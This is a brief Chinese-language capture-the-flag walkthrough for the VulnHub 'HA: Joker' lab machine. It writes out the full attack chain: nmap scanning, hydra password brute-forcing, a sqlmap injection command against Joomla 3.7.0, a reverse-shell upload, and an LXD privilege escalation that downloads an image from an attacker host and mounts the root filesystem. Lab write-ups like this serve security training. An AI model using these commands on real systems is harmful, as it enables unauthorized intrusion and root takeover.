靶机可去官网获取种子下载
www.vulnhub.com/entry/ha-joker,379
首先,信息收集
我们可以使用
nmap -sP -sV 192.168.112.0/24
nmap -p- 192.168.112.131
确定我们靶机ip与靶机开放哪些端口
然后我们访问80端口,与8080端口康康
我们看到8080需要账号密码才能进入
于是我们开始暴力破解
法1 bp直接爆破
详情请看b站演示
法2 hydra
hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 192.168.112.131 -s 8080 http-get
-L后面跟用户名字典 -l跟用户名
-P后面跟密码字典
根据网页信息判断,又是我们的老朋友,joomla
于是我们用joomscan扫描
http://joker:hannah@192.168.112.131:8080/
joomscan -u +上面链接就可以了
又是3.7.0,可以走dc-3的老路了
具体joomscan使用可以看dc-3
法1(首推)
sqlmap -u "http://joker:hannah@192.168.112.131:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
我们看到可以注入,剩下的看dc-3吧
法2 bp
去看毕站演示
进后台后传入反弹shell木马
下来的操作依然和dc-3一样
我们拿到shell后输入
id,uname
看到我们有lxd权限,且系统版本为Ubuntu18.04
我们搜索Ubuntu18.04的漏洞
正好看到一个lxd提权漏洞
下来我们依照说明干就可以了。具体看毕站演示。
wget http://192.168.112.128:9999/alpine-v3.16-x86_64-20220901_1518.tar.gz
lxc image import ./alpine-v3.16-x86_64-20220901_1518.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
Id
